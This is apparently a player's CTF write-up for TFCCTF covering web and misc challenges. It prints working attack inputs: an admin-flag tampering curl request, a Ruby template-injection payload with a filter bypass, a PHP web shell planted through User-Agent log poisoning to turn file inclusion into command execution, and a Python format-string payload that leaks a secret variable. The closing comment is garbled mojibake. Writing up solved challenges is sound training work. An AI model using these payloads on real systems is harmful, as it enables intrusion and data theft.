I skipped write-up super easy problems.
WEB
โ [ Are you Admin? ]
I can't modify "isAdmin" section by fiddler, so I decided to use curl command to fix isAdmin = true.
curl -i -H 'Content-Type: application/json' -d '{"username":"derp","isAdmin":true}' 'http://01.linux.challenges.ctf.thefewchosen.com:49395/api/auth'
Flag : TFCCTF{S4n1t1z3_Y0ur_1nput5!}
โ [ DeepLinks ]
Description tells "Find out hidden page". I thought it's impossible to write down all suspected pages. So used tools "dirsearch"
I finllay found out "/.well-known/apple-app-site-association" page. Enter this web page, I can download a file.
Open it with notepad, contents is like this.
{
"applinks": {
"apps": [],
"details": [
{
"appID": "ABCDEFGHIJ.com.example.example",
"paths": ["TFCCTF{4ppl3_4pp_51t3_4550c14t10n}"]
}
]
}
}Flag : TFCCTF{4ppl3_4pp_51t3_4550c14t10n}
โ [ Diamonds ]
I can get hint from title of web page, "Ruby".
I can get hint which is Ruby SSTI vulnerability after searching "Ruby vulnerability" on google. Ruby's template is like "<% ~~ %>". But, because of filtering, I can't use "<", ">", "%". So I use url newline command "%0a" to bypass filtering.
Payload : TEST%0a<%25=+File.open('flag.txt').read+%25>
Flag : TFCCTF{02718f35dddc266e0ac40c0c0dcc98c34edd545678dc752ba9831b6d73bc706f}
โ [ Includes What Matters ]
The main page is this.
And enter the hyperlink.
I can see file parameter with test.txt & "include_path". It seems that this service uses apache & PHP. Using file parameter, I try to exploit.
I enter "/etc/passwd" file, but no flags in here. So I use "User-agent" info to trigger RCE.
User-agent: <?php system($_GET['shell'])?>Now, I can use two parameters, file and shell. Check this out. I send "?file=/var/log/apache2/access.log&shell=ls".
I can see "index.php static" at last line. RCE trigger successed. Searching where flag is, and check it, I can get flag.
The flag's path is "/hidden_fl4g.txt"
Flag : TFCCTF{LF1_1S_D4NG3R0US_4ND_L34DS_T0_RC3}
[ Calendar ]
I have to find password. Password equals flag.
This is main page.
Nothing seems to be suspicious. So I enter sample page.
I can see parameter "page_id=2". So I tested this paramter. I input "page_id=3", "page_id=4".
But when I changed paramter to "page_id=5", things are changed.
I can see password.
Flag : TFCCTF{WPNe3MgF$sNj8E8F6d}
MISC
โ [ Discord SHENANIGANS V2 ]
I think I have to ask some secret command to Discord Bot to get flag. First, I send "/flag" to bot.
Not this command. I ask command nicely. "/flag please"
I can get hint "exfilterate the flag". I search other section in discord, and found that flags in #announcement.
I found two images. I picked second one, download it, and upload it exiftools online. ( I used https://jimpl.com/)
Flag : TFCCTF{h1dd3n_1n_pl4in_br3ad!...1_m3an_s1gh7}
โ [ Pattern ]
There's only one file, main.py
# main.py
import dataclasses
import errno
import os
import random
FLAG = os.environ.get("FLAG")
if not FLAG:
print("If you're running this locally, please create a fake flag env variable.")
print("If you're seeing this on the remote server, please contact the admins.")
exit(errno.ENOENT)
@dataclasses.dataclass
class Message:
message: str
def __str__(self):
return self.message
__repr__ = __str__
MESSAGES = [
Message("Thank you for using our service."),
Message("Here is your pattern:"),
Message("Until next time!")
]
pattern = input("pattern> ")
count = int(input("count> "))
final_pattern = pattern * count
print(f"{{message}} {final_pattern}".format(message=random.choice(MESSAGES)))It's basic program, runs like this.
Important code in here is format string. By manipulating message class, can trigger the flag.
Reference : https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/
Payload : {message.__str__.__globals__[FLAG]}Flag : TFCCTF{Th15_G1vEs_pr1ntf_v1b35}
Comment :
๋์ถฉ ์ด๋ป๊ฒ ํ๋ฉด ํ๋๊ทธ๊ฐ ๋์ฌ ์ง ์์ํ๋ ๋ฌธ์ ๊ฐ ๋ง์๋ค. ํ์ง๋ง ํดํนํด ์ฌ์ฉ๋ฒ์ ๋ชฐ๋ผ ์ฌ์ด ๋ฌธ์ ์๋ ๋ถ๊ตฌํ๊ณ ์๊ฐ์ด ๊ฝค ์ก์๋จนํ๋ค. ๊ทธ ๋ฐ์๋ ๊ธฐ๋ณธ์ ์ธ ๋ช ๋ น์ด ์ฌ์ฉ๋ฒ๋ค์ ๋ง์ด ๊น๋จน์ด์ ๊ตฌ๊ธ๋งํ๋ ๋ฐ ์๊ฐ ์์๊ฐ ๋ง์ด ๋๋ค. ๊ธฐ๋ณธ๋ถํฐ ๋ค์ ๊ณต๋ถํด์ผ ํ ๋ฏ ์ถ๋ค.